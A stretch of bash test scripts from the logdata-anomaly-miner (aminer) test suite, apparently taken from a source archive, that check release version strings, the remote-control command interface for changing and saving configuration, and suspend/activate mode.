END
if [[ "$OUTPUT" != *"$VAR"* ]]; then
  echo "$VAR"
  echo
  exit_code=1
fi

read -r -d '' VAR << END
New path(s) detected
NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines)
/model/data: b2
['/model/data']
b2
END
if [[ "$OUTPUT" != *"$VAR"* ]]; then
  echo "$VAR"
  echo
  exit_code=1
fi

read -r -d '' VAR << END
New path(s) detected
NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines)
/model/data: c2
['/model/data']
c2
END
if [[ "$OUTPUT" != *"$VAR"* ]]; then
  echo "$VAR"
  echo
  exit_code=1
fi

read -r -d '' VAR << END
New path(s) detected
NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines)
/model/data: z2
['/model/data']
z2
END
if [[ "$OUTPUT" != *"$VAR"* ]]; then
  echo "$VAR"
  echo
  exit_code=1
fi

# Only the copied input logs are removed; /tmp/out.txt is left behind.
sudo rm /tmp/file1.log
sudo rm /tmp/file2.log
exit $exit_code
logdata-anomaly-miner-2.8.0/aecid-testsuite/runReleaseStringCheck.sh000077500000000000000000000022361500476301700255750ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh METADATA_PATH=../source/root/usr/lib/logdata-anomaly-miner/metadata.py CONF_PATH=../docs/conf.py version=$(grep "__version__ =" $METADATA_PATH) version=$(sed 's/__version__ = //g' <<< $version) version=$(sed 's/"//g' <<< $version) release=$(grep "release =" $CONF_PATH) release=$(sed "s/release = //g" <<< $release) release=$(sed "s/'//g" <<< $release) if [[ "$version" == "" || "$release" == "" ]]; then exit 1 fi if [[ "$version" != "$release" ]]; then echo "Version $version not equal with $release." if [[ $# -eq 1 ]]; then if [[ "$1" != "-u" && "$1" != "--update" ]]; then echo "Unknown Parameter $1. Exiting.." exit 1 else compareVersionStrings "$version" "$release" res=$? if [[ $res -eq 1 ]]; then sed -i "s/release = '$release'/release = '$version'/g" $CONF_PATH echo "Updated version string in $CONF_PATH from $release to $version." elif [[ $res -eq 2 ]]; then sed -i "s/__version__ = \"$version\"/__version__ = \"$release\"/g" $METADATA_PATH echo "Updated version string in $METADATA_PATH from $version to $release." fi fi fi exit 1 fi logdata-anomaly-miner-2.8.0/aecid-testsuite/runRemoteControlTest.sh000077500000000000000000000630641500476301700255320ustar00rootroot00000000000000#!/bin/bash FILE=/tmp/demo-config.py CMD_PATH=/tmp/commands.txt sudo cp demo/aminerRemoteControl/demo-config.py $FILE sudo sed -i 's/StreamPrinterEventHandler(analysis_context)/StreamPrinterEventHandler(analysis_context, stream=open("\/tmp\/log.txt", "a"))/g' $FILE sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir -p /tmp/lib/aminer/log sudo chown -R aminer:aminer /tmp/lib 2> /dev/null sudo rm /tmp/syslog 2> /dev/null touch /tmp/syslog OUTPUT_FILE=/tmp/output.txt sudo aminer --config "$FILE" & > $OUTPUT_FILE for i in {1..60}; do grep "INFO aminer started." /tmp/lib/aminer/log/aminer.log > /dev/null 2>&1; if [[ $? 
== 0 ]]; then break; fi; sleep 1; done stdout=$(sudo aminerremotecontrol --exec-file $CMD_PATH) expected="File $CMD_PATH does not exist" if [[ "$stdout" != "$expected" ]]; then echo "$ERROR exec-file not exists." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi START_TIME=$(date +%s) PREFIX="Remote execution response: " NOT_FOUND_WARNINGS="WARNING: config_properties['Core.PersistencePeriod'] = not found in the old config file.\nWARNING: config_properties['Log.StatisticsLevel'] = not found in the old config file.\nWARNING: config_properties['Log.DebugLevel'] = not found in the old config file.\nWARNING: config_properties['Log.StatisticsPeriod'] = not found in the old config file.\n" ERROR="Error at:" exit_code=0 expected_list="" echo "print_config_property(analysis_context, 'Core.PersistenceDir')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "print_config_property(analysis_context, 'Core.PersistenceDir')") expected="$PREFIX'\"Core.PersistenceDir\": /tmp/lib/aminer'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR error printing 'Core.PersistenceDir'." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "print_config_property(analysis_context, 'Core.PersistencePeriod')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "print_config_property(analysis_context, 'Core.PersistencePeriod')") expected="$PREFIX'\"Resource \\\\\"Core.PersistencePeriod\\\\\" could not be found.\"'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR error printing 'Core.PersistencePeriod'." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi # check if proper mail address validation is done. properties=("'MailAlerting.TargetAddress'" "'MailAlerting.FromAddress'") # only test 'MailAlerting.TargetAddress' to reduce runtime and expect 'MailAlerting.FromAddress' to work the same way. 
properties=("'MailAlerting.TargetAddress'") valid_addresses=("'test123@gmail.com'" "'root@localhost'" ) error_addresses=("'domain.user1@localhost'" "'root@notLocalhost'") for property in "${properties[@]}"; do for address in "${valid_addresses[@]}"; do echo "change_config_property(analysis_context, $property, $address)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $address)") expected="$PREFIX\"$property changed to $address successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property to $address." echo "Expected: $expected" echo "$stdout" echo exit_code=1 fi done for address in "${error_addresses[@]}"; do echo "change_config_property(analysis_context, $property, $address)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $address)") expected="$PREFIX'FAILURE: MailAlerting.TargetAddress and MailAlerting.FromAddress must be email addresses!'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property to $address." 
echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi done done INTEGER_CONFIG_PROPERTIES=("'MailAlerting.AlertGraceTime'" "'MailAlerting.EventCollectTime'" "'MailAlerting.MinAlertGap'" "'MailAlerting.MaxAlertGap'" "'MailAlerting.MaxEventsPerMessage'" "'Core.PersistencePeriod'" "'Log.StatisticsLevel'" "'Log.DebugLevel'" "'Log.StatisticsPeriod'" "'Resources.MaxMemoryUsage'") STRING_CONFIG_PROPERTIES=("'MailAlerting.TargetAddress'" "'MailAlerting.FromAddress'" "'MailAlerting.SubjectPrefix'" "'LogPrefix'") for property in "${STRING_CONFIG_PROPERTIES[@]}"; do echo "change_config_property(analysis_context, $property, 123)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, 123)") expected="$PREFIX\"FAILURE: the value of the property $property must be of type !\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property wrong Type." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "change_config_property(analysis_context, $property, 'root@localhost')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, 'root@localhost')") expected="$PREFIX\"$property changed to 'root@localhost' successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property to 'root@localhost'." 
echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi done for property in "${INTEGER_CONFIG_PROPERTIES[@]}"; do echo "change_config_property(analysis_context, $property, '1')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, '1')") expected="$PREFIX\"FAILURE: the value of the property $property must be of type !\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" && "$stdout" != "$PREFIX'FAILURE: it is not safe to run the aminer with less than 32MB RAM.'" ]]; then echo "$ERROR changing $property wrong Type." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "change_config_property(analysis_context, $property, 1)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, 1)") expected="$PREFIX\"$property changed to '1' successfully.\"" if [[ "$stdout" == "$PREFIX'FAILURE: it is not safe to run the aminer with less than 32MB RAM.'" ]]; then expected_list="${expected_list}${stdout} " else expected_list="${expected_list}${expected} " fi if [[ "$stdout" != "$expected" && "$stdout" != "$PREFIX'FAILURE: it is not safe to run the aminer with less than 32MB RAM.'" ]]; then echo "$ERROR changing $property to 1." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi done properties=("'Log.StatisticsLevel'" "'Log.DebugLevel'") for property in "${properties[@]}"; do value=0 echo "change_config_property(analysis_context, $property, $value)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $value)") expected="$PREFIX\"$property changed to '$value' successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property to $value." 
echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi value=1 echo "change_config_property(analysis_context, $property, $value)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $value)") expected="$PREFIX\"$property changed to '$value' successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property to $value." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi value=2 echo "change_config_property(analysis_context, $property, $value)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $value)") expected="$PREFIX\"$property changed to '$value' successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property to $value." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi value=-1 echo "change_config_property(analysis_context, $property, $value)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $value)") expected="$PREFIX'FAILURE: STAT_LEVEL $value is not allowed. Allowed STAT_LEVEL values are 0, 1, 2.'" if [[ "$stdout" == "$PREFIX'FAILURE: DEBUG_LEVEL $value is not allowed. Allowed DEBUG_LEVEL values are 0, 1, 2.'" ]]; then expected_list="${expected_list}${stdout} " else expected_list="${expected_list}${expected} " fi if [[ "$stdout" != "$expected" && "$stdout" != "$PREFIX'FAILURE: DEBUG_LEVEL $value is not allowed. Allowed DEBUG_LEVEL values are 0, 1, 2.'" ]]; then echo "$ERROR changing $property to $value." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi value=3 echo "change_config_property(analysis_context, $property, $value)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $value)") expected="$PREFIX'FAILURE: STAT_LEVEL $value is not allowed. 
Allowed STAT_LEVEL values are 0, 1, 2.'" if [[ "$stdout" == "$PREFIX'FAILURE: DEBUG_LEVEL $value is not allowed. Allowed DEBUG_LEVEL values are 0, 1, 2.'" ]]; then expected_list="${expected_list}${stdout} " else expected_list="${expected_list}${expected} " fi if [[ "$stdout" != "$expected" && "$stdout" != "$PREFIX'FAILURE: DEBUG_LEVEL $value is not allowed. Allowed DEBUG_LEVEL values are 0, 1, 2.'" ]]; then echo "$ERROR changing $property to $value." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi done echo "rename_registered_analysis_component(analysis_context,'NewMatchPathValueCombo','NewMatchPathValueComboDetector')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "rename_registered_analysis_component(analysis_context,'NewMatchPathValueCombo','NewMatchPathValueComboDetector')") expected="$PREFIX\"Component 'NewMatchPathValueCombo' renamed to 'NewMatchPathValueComboDetector' successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR renames the 'NewMatchPathValueCombo' component to 'NewMatchPathValueComboDetector'." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "rename_registered_analysis_component(analysis_context,'NewMatchPathValueComboDetector', 222)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "rename_registered_analysis_component(analysis_context,'NewMatchPathValueComboDetector', 222)") expected="$PREFIX\"FAILURE: the parameters 'old_component_name' and 'new_component_name' must be of type str.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR renames the 'NewMatchPathValueComboDetector' wrong Type. 
(no string; integer value)" echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "rename_registered_analysis_component(analysis_context,'NonExistingDetector','NewMatchPathValueComboDetector')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "rename_registered_analysis_component(analysis_context,'NonExistingDetector','NewMatchPathValueComboDetector')") expected="$PREFIX\"FAILURE: the component 'NonExistingDetector' does not exist.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR renames a non existing component to 'NewMatchPathValueComboDetector'." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', False)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', False)") expected="$PREFIX\"'NewMatchPathValueComboDetector.learn_mode' changed from False to False successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' to False." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', 'True')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', 'True')") expected="$PREFIX\"FAILURE: property 'NewMatchPathValueComboDetector.learn_mode' must be of type !\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' wrong Type." 
echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "print_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'target_path_list')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "print_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'target_path_list')") expected="$PREFIX'\"NewMatchPathValueComboDetector.target_path_list\": [\"/model/IPAddresses/Username\", \"/model/IPAddresses/IP\"]'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR prints the current list of paths." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "print_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'other_path_list')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "print_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'other_path_list')") expected="$PREFIX\"FAILURE: the component 'NewMatchPathValueComboDetector' does not have an attribute named 'other_path_list'.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR prints not existing attribute." 
echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', NewMatchPathDetector(analysis_context.aminer_config, analysis_context.atomizer_factory.event_handler_list, learn_mode=True), 'NewMatchPathDet')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', NewMatchPathDetector(analysis_context.aminer_config, analysis_context.atomizer_factory.event_handler_list, learn_mode=True), 'NewMatchPathDet')") expected="$PREFIX\"Component 'NewMatchPathDet' added to 'AtomFilter' successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR add a new NewMatchPathDetector to the config." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', 'StringDetector', 'StringDetector')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', 'StringDetector', 'StringDetector')") expected="$PREFIX\"FAILURE: 'component' must implement the AtomHandlerInterface!\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR add a wrong class to the config." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "save_current_config(analysis_context,'/tmp/config.py')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "save_current_config(analysis_context,'/tmp/config.py')") expected="${PREFIX}\"${NOT_FOUND_WARNINGS}Successfully saved the current config to /tmp/config.py.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR save the current config to /tmp/config.py." 
echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi sudo rm /tmp/config.py echo "save_current_config(analysis_context,'[/path/config.py')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "save_current_config(analysis_context,'[/path/config.py')") expected="${PREFIX}'Exception: [/path/config.py is not a valid filename!'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR save the current config to an invalid path." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "save_current_config(analysis_context,'/notExistingPath/config.py')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "save_current_config(analysis_context,'/notExistingPath/config.py')") expected="${PREFIX}\"${NOT_FOUND_WARNINGS}FAILURE: file '/notExistingPath/config.py' could not be found or opened!\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR save the current config to an not existing directory path." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "persist_all()" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "persist_all()") expected="${PREFIX}'OK'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR persist_all." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi # echo "create_backup(analysis_context)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "create_backup(analysis_context)") expected="${PREFIX}'Created backup " # expected_list="${expected_list}${expected} # " if [[ "$stdout" != "$expected"* ]]; then echo "$ERROR creating backup." 
echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi # echo "list_backups(analysis_context)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "list_backups(analysis_context)") expected="${PREFIX}'\"backups\": [" # expected_list="${expected_list}${expected} # " if [[ "$stdout" != "$expected"* ]]; then echo "$ERROR listing backups." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi timestamp=$(date +%s) echo "allowlist_event_in_component(analysis_context,'EnhancedNewValueCombo',($timestamp,('/model/path',1)),allowlisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'EnhancedNewValueCombo',($timestamp,('/model/path',1)),allowlisting_data=None)") expected="${PREFIX}\"Allowlisted path(s) /model/DailyCron/UName, /model/DailyCron/JobNumber with ($timestamp, ('/model/path', 1)).\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event EnhancedNewMatchPathDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "allowlist_event_in_component(analysis_context,'MissingMatch',(' ','/model/DiskReport/Space'),allowlisting_data=-1)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'MissingMatch',(' ','/model/DiskReport/Space'),allowlisting_data=-1)") expected="${PREFIX}\"Updated ' ' in '/model/DiskReport/Space' to new interval 2.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event MissingMatchPathDetector." 
echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "allowlist_event_in_component(analysis_context,'NewMatchPath','/model/somepath',allowlisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPath','/model/somepath',allowlisting_data=None)") expected="${PREFIX}'Allowlisted path(s) /model/somepath in Analysis.NewMatchPathDetector.'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event NewMatchPathDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "allowlist_event_in_component(analysis_context,'NewMatchPathValueComboDetector',(b'value1',b'value2'),allowlisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPathValueComboDetector',(b'value1',b'value2'),allowlisting_data=None)") expected="${PREFIX}\"Allowlisted path(s) /model/IPAddresses/Username, /model/IPAddresses/IP with (b'value1', b'value2').\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event NewMatchPathValueCombo." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "allowlist_event_in_component(analysis_context,'NewMatchIdValueComboDetector',{'/model/type/path/id':1, '/model/type/syscall/id':1},allowlisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchIdValueComboDetector',{'/model/type/path/id':1, '/model/type/syscall/id':1},allowlisting_data=None)") expected="${PREFIX}\"Allowlisted path(s) /model/type/path/id, /model/type/syscall/id with {'/model/type/path/id': 1, '/model/type/syscall/id': 1}.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event NewMatchIdValueComboDetector." 
echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "allowlist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',allowlisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',allowlisting_data=None)") expected="${PREFIX}'Allowlisted path /model/somepath in Analysis.EventCorrelationDetector.'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event EventCorrelationDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "allowlist_event_in_component(analysis_context,'NewMatchPathValue',b'/model/somepath',allowlisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPathValue',b'/model/somepath',allowlisting_data=None)") expected="${PREFIX}'Allowlisted path(s) /model/DailyCron/Job Number, /model/IPAddresses/Username with /model/somepath.'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event NewMatchPathValueDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "blocklist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',blocklisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "blocklist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',blocklisting_data=None)") expected="${PREFIX}'Blocklisted path /model/somepath in Analysis.EventCorrelationDetector.'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR blocklist_event EventCorrelationDetector." 
echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "blocklist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',blocklisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "blocklist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',blocklisting_data=None)") expected="${PREFIX}'Blocklisted path /model/somepath in Analysis.EventCorrelationDetector.'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR blocklist_event EventCorrelationDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi EXEC_TIME=$(($(date +%s)-START_TIME)) echo "print_current_config(analysis_context)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "print_current_config(analysis_context)") expected="$PREFIX None" if [[ "$stdout" == "$expected" ]]; then echo "$ERROR print config had an execution error." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi stdout=$(echo "$stdout" | sed -e "s/\"next_persist_time\".*,//") expected_list="${expected_list}${stdout} " echo "reopen_event_handler_streams(analysis_context)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "reopen_event_handler_streams(analysis_context)") expected="$PREFIX'Reopened all StreamPrinterEventHandler streams.'" if [[ "$stdout" != "$expected" ]]; then echo "$ERROR reopen_event_handler_streams had an execution error." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi stdout=$(echo "$stdout" | sed -e "s/\"next_persist_time\".*,//") expected_list="${expected_list}${stdout} " sudo pkill -x aminer.py sudo pkill -x aminer sleep 3 sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir -p /tmp/lib/aminer/log sudo chown -R aminer:aminer /tmp/lib 2> /dev/null sudo rm /tmp/syslog 2> /dev/null touch /tmp/syslog sudo aminer --config "$FILE" & > $OUTPUT_FILE for i in {1..60}; do grep "INFO aminer started." 
/tmp/lib/aminer/log/aminer.log > /dev/null 2>&1; if [[ $? == 0 ]]; then break; fi; sleep 1; done START_TIME=$(date +%s) stdout=$(sudo aminerremotecontrol --exec-file $CMD_PATH) stdout=$(echo "$stdout" | sed -e "s/\"next_persist_time\".*,//") expected_list=$(echo "$expected_list" | sed -e "s/\"next_persist_time\".*,//") if [[ "$stdout" != "$expected_list" ]]; then echo "$ERROR exec-file." echo "$stdout" echo echo "Expected: $expected_list" echo exit_code=1 fi EXEC_FILE_TIME=$(($(date +%s)-START_TIME)) sudo pkill -x aminer.py sudo pkill -x aminer sleep 3 sudo rm $CMD_PATH sudo rm $OUTPUT_FILE echo "Command execution time with --exec ${EXEC_TIME}s" echo "Command execution time with --exec-file ${EXEC_FILE_TIME}s" exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runSuspendModeTest.sh000077500000000000000000000070141500476301700251550ustar00rootroot00000000000000#!/bin/bash sudo cp demo/aminerRemoteControl/demo-config.py /tmp/demo-config.py echo "config_properties['Core.PersistencePeriod'] = 15" | sudo tee -a /tmp/demo-config.py > /dev/null sudo chown aminer:aminer /tmp/demo-config.py 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir -p /tmp/lib/aminer/log sudo chown -R aminer:aminer /tmp/lib 2> /dev/null sudo rm /tmp/syslog 2> /dev/null touch /tmp/syslog FILE=/tmp/demo-config.py if ! test -f "$FILE"; then echo "$FILE does not exist!" exit 1 fi exit_code=0 SUSPEND_FILE=/tmp/suspend_output.txt SUSPEND_FILE_MD5=/tmp/suspend.md5 sudo aminer --config "$FILE" > $SUSPEND_FILE & PID=$! for i in {1..60}; do grep "INFO aminer started." /tmp/lib/aminer/log/aminer.log > /dev/null 2>&1; if [[ $? == 0 ]]; then break; fi; sleep 1; done md5sum $SUSPEND_FILE > $SUSPEND_FILE_MD5 2> /dev/null echo "User username logged in" >> /tmp/syslog for i in {1..60}; do grep "Original log line: User username logged in" $SUSPEND_FILE > /dev/null 2>&1; if [[ $? 
== 0 ]]; then break; fi; sleep 1; done md5_result=`md5sum -c $SUSPEND_FILE_MD5 2> /dev/null` if [[ $md5_result == "$SUSPEND_FILE: OK" ]]; then echo 'The aminer should have produced outputs, but md5sum does not indicate any changes. (1)' exit_code=1 fi find /tmp/lib/aminer -type f ! -path "/tmp/lib/aminer/log/aminerRemoteLog.log" ! -path "/tmp/lib/aminer/log/aminer.log" ! -path "/tmp/lib/aminer/log/statistics.log" -exec md5sum {} \; | tee /tmp/test1.md5 > /dev/null md5sum $SUSPEND_FILE > $SUSPEND_FILE_MD5 2> /dev/null sudo aminerremotecontrol --exec "suspend" > /dev/null echo " Current Disk Data is: Filesystem Type Size Used Avail Use% %" >> /tmp/syslog sleep 20 md5_result=`md5sum -c $SUSPEND_FILE_MD5 2> /dev/null` if [[ $md5_result != "$SUSPEND_FILE: OK" ]]; then echo 'The aminer has produced outputs after being suspended.' exit_code=1 fi find /tmp/lib/aminer -type f ! -path "/tmp/lib/aminer/log/aminerRemoteLog.log" ! -path "/tmp/lib/aminer/log/aminer.log" ! -path "/tmp/lib/aminer/log/statistics.log" -exec md5sum {} \; | tee /tmp/test2.md5 > /dev/null sudo aminerremotecontrol --exec "activate" > /dev/null for i in {1..60}; do grep "Original log line: Current Disk Data is: Filesystem Type Size Used Avail Use% %" $SUSPEND_FILE > /dev/null 2>&1; if [[ $? == 0 ]]; then break; fi; sleep 1; done if [[ $md5_result == "/tmp/syslog: OK" ]]; then echo 'The aminer should have produced outputs, but md5sum does not indicate any changes. (2)' exit_code=1 fi for i in {1..60}; do test -f /tmp/lib/aminer/AnalysisChild/RepositioningData; if [[ $? == 0 ]]; then break; fi; sleep 1; done find /tmp/lib/aminer -type f ! -path "/tmp/lib/aminer/log/aminerRemoteLog.log" ! -path "/tmp/lib/aminer/log/aminer.log" ! 
